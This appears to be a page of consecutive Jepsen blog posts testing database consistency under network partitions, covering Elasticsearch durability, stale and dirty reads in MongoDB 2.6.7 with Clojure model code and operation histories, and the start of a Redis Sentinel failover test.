{:valid? false, :lost "#{0..49 301..302 307 309 319..322 325 327 334 341 351 370 372 381 405 407 414 416 436 438 447 460..462 475 494 497 499 505 .......... 10339..10343 10345..10347 10351..10359 10361 10363..10365 10367 10370 10374 10377 10379 10381..10385 10387..10391 10394..10395 10397..10405 10642 10649 10653 10661 10664 10668..10669 10671 10674..10676 10681 10685 10687 10700..10718}", :recovered "#{2129 2333 2388 2390 2392..2395 2563 2643 2677 2680 2682..2683 4470 4472 4616 4635 4675..4682 4766 4864 4967 5024..5026 5038 5042..5045 5554 5556..5557 5696..5697 5749..5757 5850 5956 6063 6115..6116 6146 6148..6149 6151 6437 6541 6553..6554 6559 6561 11037 11136 11241 11291..11295}", :ok "#{289..300 303..306 308 310..318 323..324 326 328..333 335..338 340 343..346 348..350 352 354..359 361..363 365..368 371 ........ 10648 10650..10652 10654..10660 10662..10663 10665..10667 10670 10672..10673 10677..10680 10682..10684 10686 10688..10699 10964 10966..10967 10969 10972..11035 11037 11136 11241 11291..11299}", :recovered-frac 37/5650, :unexpected-frac 0, :unexpected "#{}", :lost-frac 23/226, :ok-frac 1463/2825}

Remember that fsync is necessary but not sufficient for durability: you must also get the filesystem, disk controller, and disks themselves to correctly flush their various caches when requested.

I don’t believe this risk is anywhere near as serious as the replication problems we’ve discussed so far. Elasticsearch replicates data to multiple nodes; my tests suggest it requires coordinated crashes of multiple processes to induce data loss. You might see this if a DC or rack loses power, if you colocate VMs, if your hosting provider restarts a bunch of nodes, etc, but those are not, in my experience, as common as network partitions.

However, it is a fault worth considering, and Zookeeper and other consensus systems do fsync on a majority of nodes before considering a write durable. On the other hand, systems like Riak, Cassandra, and Elasticsearch have chosen not to fsync before acknowledgement. Why? I suspect this has to do with sharding.

Fsync in Postgres is efficient because it can batch multiple operations into a single sync. If you do 200 writes every millisecond, and fsync once per millisecond, all 200 unflushed writes are contiguous in a single file in the write-ahead log.

In Riak, a single node may run dozens of virtual nodes, and each one has a distinct disk store and corresponding WAL. Elasticsearch does something similar: it may have n Lucene instances on a given node, and a separate translog file for each one. If you do 200 writes per millisecond against a Riak or Elasticsearch node, they’ll likely end up spread across all n logs, and each must be separately fsynced. This reduces locality advantages, forcing the disk and caches to jump back and forth between random blocks–which inflates fsync latencies.

Anyway, depending on how durable Elasticsearch aims to be, they may wind up implementing a unified translog and blocking acknowledgements until writes have been flushed to disk. Or they may decide that this is the intended balance and keep things where they are–after all, replication mitigates the risk of loss here. Since crash-restart durable storage is a prerequisite for most consensus algorithms, I have a hunch we’ll see stronger guarantees as Elasticsearch moves towards consensus on writes.

Recap

Elasticsearch 1.5.0 still loses data in every scenario tested in the last Jepsen post, and in some scenarios I wasn’t able to test before. You can lose documents if:

  • The network partitions into two intersecting components
  • Or into two discrete components
  • Or if even a single primary is isolated
  • If a primary pauses (e.g. due to disk IO or garbage collection)
  • If multiple nodes crash around the same time

However, the window of split-brain has been reduced; most notably, Elasticsearch will no longer maintain dual primaries for the full duration of an intersecting partition.

My recommendations for Elasticsearch users are unchanged: store your data in a database with better safety guarantees, and continuously upsert every document from that database into Elasticsearch. If your search engine is missing a few documents for a day, it’s not a big deal; they’ll be reinserted on the next run and appear in subsequent searches. Not using Elasticsearch as a system of record also insulates you from having to worry about ES downtime during elections.

Finally, Elastic has gone from having essentially no failure-mode documentation to a delightfully detailed picture of the database’s current and past misbehaviors. This is wonderful information for users and I’d love to see this from other vendors.

Up next: Aerospike.

Stripe

This work is a part of my research at Stripe, and I would like to thank everyone there (especially Marc Hedlund) for helping me test distributed systems and publish articles like this. I’m indebted to Boaz Leskes, Lee Hinman and Shay Banon for helping to replicate and explain these test cases. Finally, my thanks to Duretti Hirpa, Coda Hale, and Camille Fournier–and especially to my accomplished and lovely wife, Mrs. Caitie McCaffrey–for their criticism and helpful feedback on earlier drafts.

In May of 2013, we showed that MongoDB 2.4.3 would lose acknowledged writes at all consistency levels. Every write concern less than MAJORITY loses data by design due to rollbacks–but even WriteConcern.MAJORITY lost acknowledged writes, because when the server encountered a network error, it returned a successful, not a failed, response to the client. Happily, that bug was fixed a few releases later.

Since then I’ve improved Jepsen significantly and written a more powerful analyzer for checking whether or not a system is linearizable. I’d like to return to Mongo, now at version 2.6.7, to verify its single-document consistency. (Mongo 3.0 was released during my testing, and I expect they’ll be hammering out single-node data loss bugs for a little while.)

In this post, we’ll see that Mongo’s consistency model is broken by design: not only can “strictly consistent” reads see stale versions of documents, but they can also return garbage data from writes that never should have occurred. The former is (as far as I know) a new result which runs contrary to all of Mongo’s consistency documentation. The latter has been a documented issue in Mongo for some time. We’ll also touch on a result from the previous Jepsen post: almost all write concern levels allow data loss.

This analysis is brought to you by Stripe, where I now work on safety and data integrity–including Jepsen–full time. I’m delighted to work here and excited to talk about new consistency problems!

We’ll start with some background, methods, and an in-depth analysis of an example failure case, but if you’re in a hurry, you can skip ahead to the discussion.

Write consistency

First, we need to understand what MongoDB claims to offer. The Fundamentals FAQ says Mongo offers “atomic writes on a per-document-level”. From the last Jepsen post and the write concern documentation, we know Mongo’s default consistency level (Acknowledged) is unsafe. Why? Because operations are only guaranteed to be durable after they have been acknowledged by a majority of nodes. We must use write concern Majority to ensure that successful operations won’t be discarded by a rollback later.

Why can’t we use a lower write concern? Because rollbacks are only OK if any two versions of the document can be merged associatively, commutatively, and idempotently–i.e., if they form a CRDT. Our documents likely don’t have this property.

For instance, consider an increment-only counter, stored as a single integer field in a MongoDB document. If you encounter a rollback and find two copies of the document with the values 5 and 7, the correct value of the counter depends on when they diverged. If the initial value was 0, we could have had five increments on one primary and seven increments on another: the correct value is 5 + 7 = 12. If, on the other hand, the value on both replicas was 5, and only two increments occurred on an isolated primary, the correct value should be 7. Or it could be any value in between!
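To see why the surviving copies alone aren’t enough: the correct merged value depends on the (generally unknown) common ancestor. A sketch of the arithmetic above:

;; The merged value of an increment-only counter is the ancestor plus the
;; increments applied on each side since divergence.
(defn merged-counter [ancestor a b]
  (+ ancestor (- a ancestor) (- b ancestor)))

(merged-counter 0 5 7) ;; => 12: both replicas diverged from 0
(merged-counter 5 5 7) ;; => 7:  only one replica took increments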

And this assumes your operations (e.g. incrementing) commute! If they’re order-dependent, Mongo will allow flat-out invalid writes to go through, like claiming the same username twice, document ID conflicts, transferring $40 + $30 = $70 out of a $50 account which is never supposed to go negative, and so on.

Unless your documents are state-based CRDTs, the following table illustrates which Mongo write concern levels are actually safe:

Write concern               Also called     Safe?
Unacknowledged              NORMAL          Unsafe: Doesn’t even bother checking for errors
Acknowledged (new default)  SAFE            Unsafe: not even on disk or replicated
Journaled                   JOURNAL_SAFE    Unsafe: ops could be illegal or just rolled back by another primary
Fsynced                     FSYNC_SAFE      Unsafe: ditto, constraint violations & rollbacks
Replica Acknowledged        REPLICAS_SAFE   Unsafe: ditto, another primary might overrule
Majority                    MAJORITY        Safe: no rollbacks (but check the fsync/journal fields)

So: if you use MongoDB, you should almost always be using the Majority write concern. Anything less is asking for data corruption or loss when a primary transition occurs.

Read consistency

The Fundamentals FAQ doesn’t just promise atomic writes, though: it also claims “fully-consistent reads”. The Replication Introduction goes on:

The primary accepts all write operations from clients. Replica set can have only one primary. Because only one member can accept write operations, replica sets provide strict consistency for all reads from the primary.

What does “strict consistency” mean? Mongo’s glossary defines it as

A property of a distributed system requiring that all members always reflect the latest changes to the system. In a database system, this means that any system that can provide data must reflect the latest writes at all times. In MongoDB, reads from a primary have strict consistency; reads from secondary members have eventual consistency.

The Replication docs agree: “By default, in MongoDB, read operations to a replica set return results from the primary and are consistent with the last write operation”, as distinct from “eventual consistency”, where “the secondary member’s state will eventually reflect the primary’s state.”

Read consistency is controlled by the Read Preference, which emphasizes that reads from the primary will see the “latest version”:

By default, an application directs its read operations to the primary member in a replica set. Reading from the primary guarantees that read operations reflect the latest version of a document.

And goes on to warn that:

…. modes other than primary can and will return stale data because the secondary queries will not include the most recent write operations to the replica set’s primary.

All read preference modes except primary may return stale data because secondaries replicate operations from the primary with some delay. Ensure that your application can tolerate stale data if you choose to use a non-primary mode.

So, if we write at write concern Majority, and read with read preference Primary (the default), we should see the most recently written value.

CaS rules everything around me

When writes and reads are concurrent, what does “most recent” mean? Which states are we guaranteed to see? What could we see?

Concurrent operations can occur in either order

For concurrent operations, the absence of synchronized clocks prevents us from establishing a total order. We must allow each operation to come just before, or just after, any other in-flight writes. If we write a, initiate a write of b, then perform a read, we could see either a or b depending on which operation takes place first.

After operations complete, visibility is guaranteed

On the other hand, we obviously shouldn’t interact with a value from the future–we have no way to tell what those operations will be. The latest possible state an operation can see is the one just prior to the response received by the client.

And because we need to see the “most recent write operation”, we should not be able to interact with any state prior to the ops concurrent with the most recently acknowledged write. It should be impossible, for example, to write a, write b, then read a: since the writes of a and b are not concurrent, the second should always win.

This is a common strong consistency model for concurrent data structures called linearizability. In a nutshell, every successful operation must appear to occur atomically at some time between its invocation and response.

So in Jepsen, we’ll model a MongoDB document as a linearizable compare-and-set (CaS) register, supporting three operations:

  • write(x'): set the register’s value to x'
  • read(x): read the current value x. Only succeeds if the current value is actually x.
  • cas(x, x'): if and only if the value is currently x, set it to x'.

We can express this consistency model as a singlethreaded datatype in Clojure. Given a register containing a value, and an operation op, the step function returns the new state of the register–or a special inconsistent value if the operation couldn’t take place.

(defrecord CASRegister [value]
  Model
  (step [r op]
    (condp = (:f op)
      :write (CASRegister. (:value op))
      :cas   (let [[cur new] (:value op)]
               (if (= cur value)
                 (CASRegister. new)
                 (inconsistent (str "can't CAS " value
                                    " from " cur " to " new))))
      :read  (if (or (nil? (:value op))
                     (= value (:value op)))
               r
               (inconsistent (str "can't read " (:value op)
                                  " from register " value))))))
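Stepping the model by hand shows how Knossos flags impossible transitions (illustrative REPL results):

(step (CASRegister. 0) {:f :write, :value 4})
;; => a CASRegister holding 4

(step (CASRegister. 4) {:f :cas, :value [0 3]})
;; => inconsistent: "can't CAS 4 from 0 to 3"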

Then we’ll have Jepsen generate a mix of random read, write, and CaS operations and apply them to a five-node Mongo cluster: over the course of a few minutes, five clients perform those ops against the cluster while a special nemesis process creates and resolves network partitions to induce cluster transitions.

Finally, we’ll have Knossos analyze the resulting concurrent history of all clients' operations, in search of a linearizable path through the history.

Inconsistent reads

Surprise! Even when all writes and CaS ops use the Majority write concern, and all reads use the Primary read preference, operations on a single document in MongoDB are not linearizable. Reads taking place just after the start of a network partition demonstrate impossible behaviors.

In this history, an anomaly appears shortly after the nemesis isolates nodes n1 and n3 from n2, n4, and n5. Each line shows a singlethreaded process (e.g. 2) performing (e.g. :invoke) an operation (e.g. :read), with a value (e.g. 3).

An :invoke indicates the start of an operation. If it completes successfully, the process logs a corresponding :ok. If it fails (by which we mean the operation definitely did not take place) we log :fail instead. If the operation crashes–for instance, if the network drops, a machine crashes, a timeout occurs, etc.–we log an :info message, and that operation remains concurrent with every subsequent op in the history. Crashed operations could take effect at any future time.

Not linearizable. Linearizable prefix was:
2 :invoke :read 3
4 :invoke :write 3
...
4 :invoke :read 0
4 :ok :read 0
:nemesis :info :start "Cut off {:n5 #{:n3 :n1}, :n2 #{:n3 :n1}, :n4 #{:n3 :n1}, :n1 #{:n4 :n2 :n5}, :n3 #{:n4 :n2 :n5}}"
1 :invoke :cas [1 4]
1 :fail :cas [1 4]
3 :invoke :cas [4 4]
3 :fail :cas [4 4]
2 :invoke :cas [1 0]
2 :fail :cas [1 0]
0 :invoke :read 0
0 :ok :read 0
4 :invoke :read 0
4 :ok :read 0
1 :invoke :read 0
1 :ok :read 0
3 :invoke :cas [2 1]
3 :fail :cas [2 1]
2 :invoke :read 0
2 :ok :read 0
0 :invoke :cas [0 4]
4 :invoke :cas [2 3]
4 :fail :cas [2 3]
1 :invoke :read 4
1 :ok :read 4
3 :invoke :cas [4 2]
2 :invoke :cas [1 1]
2 :fail :cas [1 1]
4 :invoke :write 3
1 :invoke :read 3
1 :ok :read 3
2 :invoke :cas [4 2]
2 :fail :cas [4 2]
1 :invoke :cas [3 1]
2 :invoke :write 4
0 :info :cas :network-error
2 :info :write :network-error
3 :info :cas :network-error
4 :info :write :network-error
1 :info :cas :network-error
5 :invoke :write 1
5 :fail :write 1
... more failing ops which we can ignore since they didn't take place ...
5 :invoke :read 0

Followed by inconsistent operation:

5 :ok :read 0
A diagram of the concurrent operations from this history

This is a little easier to understand if we sketch a diagram of the last few operations–the events occurring just after the network partition begins. In this notation, time moves from left to right, and each process is a horizontal track. A green bar shows the interval between :invoke and :ok for a successful operation. Processes that crashed with :info are shown as yellow bars running to infinity–they’re concurrent with all future operations.

In order for this history to be linearizable, we need to find a path which always moves forward in time, touches each OK (green) operation once, and may touch crashed (yellow) operations at most once. Along that path, the rules we described for a CaS register should hold–writes set the value, reads must see the current value, and compare-and-set ops set a new value iff the current value matches.

An initial path

The very first operation here is process 2’s read of the value 0. We know the value must be zero when it completes, because there are no other concurrent ops.

The next read we have to satisfy is process 1’s read of 4. The only operation that could have taken place between those two reads is process 0’s crashed CaS from 0 to 4, so we’ll use that as an intermediary.

Note that this path always moves forward in time: linearizability requires that operations take effect sometime between their invocation and their completion. We can choose any point along the operation’s bar for the op to take effect, but can’t travel through time by drawing a line that moves back to the left! Also note that along the purple line, our single-threaded model of a register holds: we read 0, change 0->4, then read 4.

Process 1 goes on to read a new value: 3. We have two operations which could take place before that read. Executing a compare-and-set from 4 to 2 would be legal because the current value is 4, but that would conflict with a subsequent read of 3. Instead we apply process 4’s write of 3 directly.

Changing 4 to 2, then an invalid read of 3
Writing 3, then reading 3

Now we must find a path leading from 3 to the final read of 0. We could write 4, and optionally CaS that 4 to 2, but neither of those values is consistent with a read of 0.

Writing 4, then an invalid read of 0
Writing 4, changing 4 to 2, then an invalid read of 0
Changing 3 to 1, then an invalid read of 0

We could also CaS 3 to 1, which would give us the value 1, but that’s not 0 either! And applying the write of 4 and its dependent paths won’t get us anywhere either; we already showed those are inconsistent with reading 0. We need a write of 0, or a CaS to 0, for this history to make sense–and no such operation could possibly have happened here.

Each of these failed paths is represented by a different “possible world” in the Knossos analysis. At the end of the file, Knossos comes to the same conclusion we drew from the diagram: the register could have been 1, 2, 3, or 4–but not 0. This history is illegal.

It’s almost as if process 5’s final read of zero is connected to the state that process 2 saw, just prior to the network partition. As if the state of the system weren’t linear after all–a read was allowed to travel back in time to that earlier state. Or, alternatively, the state of the system split in two–one for each side of the network partition–writes occurring on one side, and on the other, the value remaining 0.

Dirty reads and stale reads

We know from this test that MongoDB does not offer linearizable CaS registers. But why?

One possibility is that this is the result of Mongo’s read-uncommitted isolation level. Although the docs say “For all inserts and updates, MongoDB modifies each document in isolation: clients never see documents in intermediate states,” they also warn:

MongoDB allows clients to read documents inserted or modified before it commits these modifications to disk, regardless of write concern level or journaling configuration…

For systems with multiple concurrent readers and writers, MongoDB will allow clients to read the results of a write operation before the write operation returns.

Which means that clients can read documents in intermediate states. Imagine the network partitions, and for a brief time, there are two primary nodes–each sharing the initial value 0. Only one of them, connected to a majority of nodes, can successfully execute writes with write concern Majority. The other, which can only see a minority, will eventually time out and step down–but this takes a few seconds.

Dirty reads take place against modified data on the minority primary. Stale reads take place against unchanged data on the minority primary, after new data has been written to the majority primary.

If a client writes (or CaS’s) the value on the minority primary to 1, MongoDB will happily modify that primary’s local state before confirming with any secondaries that the write is safe to perform! It’ll be changed back to 0 as a part of the rollback once the partition heals–but until that time, reads against the minority primary will see 1, not 0! We call this anomaly a dirty read because it exposes garbage temporary data to the client.

Alternatively, no changes could occur on the minority primary–or whatever writes do take place leave the value unchanged. Meanwhile, on the majority primary, clients execute successful writes or CaS ops, changing the value to 1. If a client executes a read against the minority primary, it will see the old value 0, even though a write of 1 has taken place.

Because Mongo allows dirty reads from the minority primary, we know it must also allow clean but stale reads against the minority primary. Both of these anomalies are present in MongoDB.

Dirty reads are a known issue, but to my knowledge, few people realize that Mongo allows stale reads at the strongest consistency settings. Since Mongo’s documentation repeatedly states this anomaly should not occur, I’ve filed SERVER-17975.

What does that leave us with?

What Mongo's documentation claims to offer, vs what it actually provides

Even with Majority write concern and Primary read preference, reads can see old versions of documents. You can write a, then write b, then read a back. This invalidates a basic consistency invariant for registers: Read Your Writes.

Mongo also allows you to read alternating fresh and stale versions of a document–successive reads could see a, then b, then a again, and so on. This violates Monotonic Reads.

Because both of these consistency models are implied by the PRAM memory model, we know MongoDB cannot offer PRAM consistency–which in turn rules out causal, sequential, and linearizable consistency.
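To make those two anomalies concrete, here's a tiny, purely illustrative checker (in Python) over a single client's session; the event encoding and the version ordering are assumptions for the example, not anything from Mongo's API.

def check_session(events, version_order):
    """events: ("write", v) or ("read", v), in the order one client issued them.
    version_order: the order in which those values were written cluster-wide."""
    rank = {v: i for i, v in enumerate(version_order)}
    last_write = None
    last_read = None
    for kind, v in events:
        if kind == "write":
            last_write = v
        else:
            if last_write is not None and rank[v] < rank[last_write]:
                return "violates Read Your Writes"
            if last_read is not None and rank[v] < rank[last_read]:
                return "violates Monotonic Reads"
            last_read = v
    return "ok"

# Write a, write b, then read a back: the stale-read anomaly described above.
print(check_session([("write", "a"), ("write", "b"), ("read", "a")], ["a", "b"]))
# Reads that alternate between fresh and stale versions of the document.
print(check_session([("read", "b"), ("read", "a")], ["a", "b"]))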

Because Mongo allows you to read uncommitted garbage data, we also know MongoDB can’t offer Read Committed, Cursor Stability, Monotonic Atomic View, Repeatable Read, or serializability. On the map of consistency models to the right, this leaves Writes Follow Reads, Monotonic Write, and Read Uncommitted–all of which, incidentally, are totally-available consistency models even when partitions occur.

Conversely, Mongo’s documentation repeatedly claims that one can read “the latest version of a document”, and that Mongo offers “immediate consistency”. These properties imply that reads, writes, and CaS against a single document should be linearizable. Linearizable consistency implies that Mongo should also ensure:

  • Sequential consistency: all processes agree on a single total order of operations
  • Causal consistency: causally related operations take effect in order
  • PRAM (Pipelined RAM): each process’s operations are observed in the order that process issued them
  • Read Your Writes: a process’s reads reflect at least its own most recent write
  • Monotonic Reads: a process’s successive reads never observe an older state
  • Monotonic Writes: a process’s successive writes take effect in the order they were issued
  • Writes Follow Reads: a process’s writes are ordered after the reads that preceded them

Mongo 2.6.7 (and presumably 3.0.0, which has the same read-uncommitted semantics) only ensures the last two invariants. I argue that this is neither “strict” nor “immediate” consistency.

How bad are dirty reads?

Read uncommitted allows all kinds of terrible anomalies we probably don’t want as MongoDB users.

For instance, suppose we have a user registration service keyed by a unique username. Now imagine a partition occurs, and two users–Alice and Bob–try to claim the same username–one on each side of the partition. Alice’s request is routed to the majority primary, and she successfully registers the account. Bob, talking to the minority primary, will see his account creation request time out. The minority primary will eventually roll his account back to a nonexistent state, and when the partition heals, accept Alice’s version.

But until the minority primary detects the failure, Bob’s invalid user registration will still be visible for reads. After registration, the web server redirects Alice to /my/account to show her the freshly created account. However, this HTTP request winds up talking to a server whose client still thinks the minority primary is valid–and that primary happily responds to a read request for the account with Bob’s information.

Alice’s page loads, and in place of her own data, she sees Bob’s name, his home address, his photograph, and other things that never should have been leaked between users.

You can probably imagine other weird anomalies. Temporarily visible duplicate values for unique indexes. Locks that appear to be owned by two processes at once. Clients seeing purchase orders that never went through.

Or consider a reconciliation process that scans the list of all transactions a client has made to make sure their account balance is correct. It sees an attempted but invalid transaction that never took place, and happily sets the user’s balance to reflect that impossible transaction. The mischievous transaction subsequently disappears on rollback, leaving customer support to puzzle over why the numbers don’t add up.

Or, worse, an admin goes in to fix the rollback, assumes the invalid transaction should have taken place, and applies it to the new primary. The user sensibly retried their failed purchase, so they wind up paying twice for the same item. Their account balance goes negative. They get hit with an overdraft fine and have to spend hours untangling the problem with support.

Read-uncommitted is scary.

What if we just fix read-uncommitted?

A diagram contrasting dirty reads (seeing unreplicated writes on the minority primary) with stale reads (seeing old data on the minority primary after the majority primary has accepted newer writes)

Mongo’s engineers initially closed the stale-read ticket as a duplicate of SERVER-18022, which addresses dirty reads. However, as the diagram illustrates, only showing committed data on the minority primary will not solve the problem of stale reads. Even if the minority primary accepts no writes at all, successful writes against the majority node will allow us to read old values.

That invalidates Monotonic Read, Read Your Writes, PRAM, causal, sequential, and linearizable consistency. The anomalies are less terrifying than Read Uncommitted, but still weird.

For instance, let’s say two documents are always supposed to be updated one after the other–like creating a new comment document, and writing a reference to it into a user’s feed. Stale reads allow you to violate the implicit foreign key constraint there: the user could load their feed and see a reference to comment 123, but looking up comment 123 in Mongo returns Not Found.

A user could change their name from Charles to Désirée, have the change go through successfully, but when the page reloads, still see their old name. Seeing old values could cause users to repeat operations that they should have only attempted once–for instance, adding two or three copies of an item to their cart, or double-posting a comment. Your clients may be other programs, not people–and computers are notorious for retrying “failed” operations very fast.

Stale reads can also cause lost updates. For instance, a web server might accept a request to change a user’s profile photo information, write the new photo URL to the user record in Mongo, and contact the thumbnailer service to generate resized copies and publish them to S3. The thumbnailer sees the old photo, not the newly written one. It happily resizes it, and uploads the old avatar to S3. As far as the backend and thumbnailer are concerned, everything went just fine–but the user’s photo never changes. We’ve lost their update.

What if we just pretend this is how it’s supposed to work?

Mongo then closed the ticket, claiming it was working as designed.

What are databases? We just don’t know.

So where does that leave us?

Despite claiming “immediate” and “strict consistency”, with reads that see “the most recent write operations”, and “the latest version”, MongoDB, even at the strongest consistency levels, allows reads to see old values of documents or even values that never should have been written. Even when Mongo supports Read Committed isolation, the stale read problem will likely persist without a fundamental redesign of the read process.

SERVER-18022 targets consistent reads for Mongo 3.1. SERVER-17975 has been re-opened, and I hope Mongo’s engineers will consider the problem and find a way to address it. Preventing stale reads requires coupling the read process to the oplog replication state machine in some way, which will probably be subtle–but Consul and etcd managed to do it in a few months, so the problem’s not insurmountable!

In the meantime, if your application requires linearizable reads, I can suggest a workaround! CaS operations appear (insofar as I’ve been able to test) to be linearizable, so you can perform a read, then try to findAndModify the current value, changing some irrelevant field. If that CaS succeeds, you know the document had that state at some time between the invocation of the read and the completion of the CaS operation. You will, however, incur an IO and latency penalty for the extra round-trips.
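Here's a rough sketch of that workaround using pymongo; the database, collection, document shape, and the _linearize field are all made up for the example. Note (per the update at the end of this post) that the modified field must actually change, or Mongo may optimize the update away entirely.

import uuid
from pymongo import MongoClient
from pymongo.write_concern import WriteConcern

client = MongoClient("mongodb://localhost:27017")
coll = client.jepsen.get_collection(
    "registers", write_concern=WriteConcern(w="majority"))

def linearizable_read(coll, doc_id):
    doc = coll.find_one({"_id": doc_id})
    if doc is None:
        return None
    # CaS on the value we just read, changing only an irrelevant field. If this
    # matches, the document really held that value at some point between the
    # read's invocation and the CaS's completion.
    matched = coll.find_one_and_update(
        {"_id": doc_id, "value": doc["value"]},
        {"$set": {"_linearize": uuid.uuid4().hex}})
    if matched is None:
        raise RuntimeError("value changed concurrently; retry")
    return doc["value"]

print(linearizable_read(coll, "some-register"))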

And remember: always use the Majority write concern, unless your data is structured as a CRDT! If you don’t, you’re looking at lost updates, and that’s way worse than any of the anomalies we’ve discussed here!

Finally, read the documentation for the systems you depend on thoroughly–then verify their claims for yourself. You may discover surprising results!

Next, on Jepsen: Elasticsearch 1.5.0

My thanks to Stripe and Marc Hedlund for giving me the opportunity to perform this research, and a special thanks to Peter Bailis, Michael Handler, Coda Hale, Leif Walsh, and Dan McKinley for their comments on early drafts. Asya Kamsky pointed out that Mongo will optimize away identity CaS operations, which prevents their use as a workaround.

If you, as a database vendor, implement a few features in your API, I can probably offer repeatable automated tests of your DB’s partition tolerance through Jepsen.

The outcome of these tests would be a set of normalized metrics for each DB like “supports linearizability”, “available for writes when a majority partition exists”, “available for writes when no majority available”, “fraction of writes successful”, “fraction of writes denied”, “fraction of writes acked then lost”, “95th latency during condition X”, and so forth. I’m thinking this would be a single-page web site–a spreadsheet, really–making it easy to compare and contrast DBs and find one that fits your safety needs.

At a minimum, I need to know:

  • After initial startup, when is the database stable and ready to accept writes?
  • For a given key, which node (if any) is the primary replica?
  • For a given key, which nodes (if any) are secondary replicas?
  • After partitions end, when has the database fully recovered? (e.g. has it completed handoff, replayed oplogs, etc)

I also need totally automated, reliable scripting of DB installation and provisioning. Many DBs make it really tough to join nodes from the shell.

This is gonna take several months of my time and a nontrivial amount of money for hardware. I’m looking at a few options, from physical hardware in my garage to renting EC2 compute nodes. EC2 means anybody could, in theory, run these benchmarks themselves–but there are a ton of moving pieces involved, it takes a lot more work to set up, and VM performance is really variable. Ideally, someone out there has five or six identical boxes they don’t need any more–maybe leftover desktops, 1Us from a decommissioned colo, whatever. They don’t have to be all that fast, but I’m hitting the limits of what I can do on virtualized infrastructure.

If you want to make this happen, and can help make the necessary API improvements, write automation scripts for Jepsen, provide hardware or hosting, etc., please email aphyr@aphyr.com.

Previously on Jepsen, we explored two-phase commit in Postgres. In this post, we demonstrate Redis losing 56% of writes during a partition.

Redis is a fantastic data structure server, typically deployed as a shared heap. It provides fast access to strings, lists, sets, maps, and other structures with a simple text protocol. Since it runs on a single server, and that server is single-threaded, it offers linearizable consistency by default: all operations happen in a single, well-defined order. There’s also support for basic transactions, which are atomic and isolated from one another.
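As a quick illustration of those transactions, here's a MULTI/EXEC block via the redis-py client; the host and key names are placeholders.

import redis

r = redis.Redis(host="localhost", port=6379)

# Queue two commands and run them as a single MULTI/EXEC block: no other
# client's commands are interleaved between them.
pipe = r.pipeline(transaction=True)
pipe.lpush("queue:jobs", "job-42")
pipe.incr("counter:jobs-enqueued")
print(pipe.execute())   # e.g. [1, 1]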

Because of this easy-to-understand consistency model, many users treat Redis as a message queue, lock service, session store, or even their primary database. Redis running on a single server is a CP system, so it is consistent for these purposes.

What about high availability?


Redis offers asynchronous primary->secondary replication. A single server is chosen as the primary, which can accept writes. It relays its state changes to secondary servers, which follow along. Asynchronous means that you don’t have to wait for a write to be replicated before the primary returns a response to the client. Writes will eventually arrive on the secondaries, if we wait long enough. In our application, all 5 clients will read from the primary on n1, and n2–n5 will be secondaries.

This is still a CP system, so long as we never read from the secondaries. If you do read from the secondaries, it’s possible to read stale data. That’s just fine for something like a cache! However, if you read data from a secondary, then write it to the primary, you could inadvertently destroy writes which completed but weren’t yet replicated to the secondaries.

What happens if the primary fails? We need to promote one of the secondary servers to a new primary. One option is to use Heartbeat or a STONITH system which keeps a link open between two servers, but if the network partitions we don’t have any way to tell whether the other side is alive or not. If we don’t promote a new primary, there may be no writable server at all. If we do promote one, there could be two primaries accepting writes. We need more nodes.

If one connected component of the network contains a majority (more than N/2) of nodes, we call it a quorum. We’re guaranteed that at most one quorum exists at any point in time–so if a majority of nodes can see each other, they know that they’re the only component in that state. That group of nodes (also termed a “component”) has the authority to promote a new primary.

Redis has a system called Sentinel, which, when configured correctly, will try to establish a quorum between Sentinel nodes, agree on which Redis servers are alive, and promote a secondary to replace any primary which appears to have failed. If we colocate the Sentinel nodes with the Redis nodes, this should allow us to promote a new primary in the majority component (should one exist).


What are the consistency and availability properties of Sentinel? Antirez, the author of Redis, says:

Redis Cluster for instance is a system biased towards consistency rather than availability. Redis Sentinel itself is an HA solution with the dogma of consistency and master slave setups.

So we expect this system to be CP. Nodes in the minority component will become unavailable during the partition, and the majority component will elect a new primary. The Sentinels will then order clients to abandon the old primary and reconnect to the new one.


Before we begin, it’s important to recognize that Redis does not guarantee durability. Since writes to disk and replication to secondaries are asynchronous, we can lose up to N seconds of the most recent writes. We should not, however, see gaps in the write log. If write n is present, so are writes 0, 1, … n-2, n-1.

Partitioning the cluster

Here’s a simple application which writes a list of numbers to a Redis set. At this time Carmine, the Clojure Redis client, doesn’t yet support failover using Sentinel. I’ve implemented a stricter version of the Sentinel client algorithm here: asking the server for a new primary before every write. Sentinel actually states that clients should only select new primaries when their connection is closed, which leaves a wider window for clients to disagree about which primary to use–leading to the possibility of more conflicting writes.
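For comparison, here's roughly what that stricter client strategy looks like using redis-py's Sentinel support (which the Clojure client lacked at the time): ask the Sentinels for the current primary before every write. The Sentinel addresses, master name "mymaster", and key name are placeholders.

from redis.sentinel import Sentinel

sentinels = Sentinel([("n1", 26379), ("n2", 26379), ("n3", 26379)],
                     socket_timeout=0.5)

def write(element):
    # master_for asks the Sentinels which node they currently consider primary;
    # nothing stops that answer from being stale by the time we write.
    primary = sentinels.master_for("mymaster", socket_timeout=0.5)
    primary.sadd("jepsen-set", element)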

Let’s give it a shot. First, set up Redis:

salticid redis.setup

Then, in two terminals, start up Redis and Redis Sentinel:

salticid redis.start
salticid redis.sentinel

You should see messages go by as the sentinels discover one another and ensure all the nodes are properly configured. You can check the replication status with salticid redis.replication. salticid redis.stop will shut down the Redis servers and sentinels alike.

Now let’s run our application with lein run redis, then partition nodes n1 and n2 away from n3, n4, and n5 by running salticid jepsen.partition.

376 :ok
378 :ok
382 :ok
384 :ok
380 :ok
381 :ok
383 :ok
389 :ok
385 :ok

The first thing you’ll notice is that even though n1 can’t possibly be replicating its writes to n3, n4, and n5, writes against it are still completing successfully. N1 still thinks it’s the primary, and since replication is asynchronous, it’s acknowledging writes before they’re sent to others in the cluster. The sentinels notice the failure, and n3, n4, and n5’s sentinels promote a new primary:

19 May 00:37:36.314 # +sdown master mymaster 10.10.3.242 6379
19 May 00:37:36.616 # +sdown slave 10.10.3.52:6379 10.10.3.52 6379 @ mymaster 10.10.3.242 6379
19 May 00:37:36.816 # +sdown sentinel 10.10.3.52:26379 10.10.3.52 26379 @ mymaster 10.10.3.242 6379
19 May 00:37:36.816 # +sdown sentinel 10.10.3.242:26379 10.10.3.242 26379 @ mymaster 10.10.3.242 6379
19 May 00:37:37.521 # +odown master mymaster 10.10.3.242 6379 #quorum 3/3
19 May 00:37:48.041 # +failover-detected master mymaster 10.10.3.242 6379
19 May 00:37:48.142 * +slave-reconf-inprog slave 10.10.3.101:6379 10.10.3.101 6379 @ mymaster 10.10.3.242 6379
19 May 00:37:48.143 * +slave-reconf-inprog slave 10.10.3.95:6379 10.10.3.95 6379 @ mymaster 10.10.3.242 6379
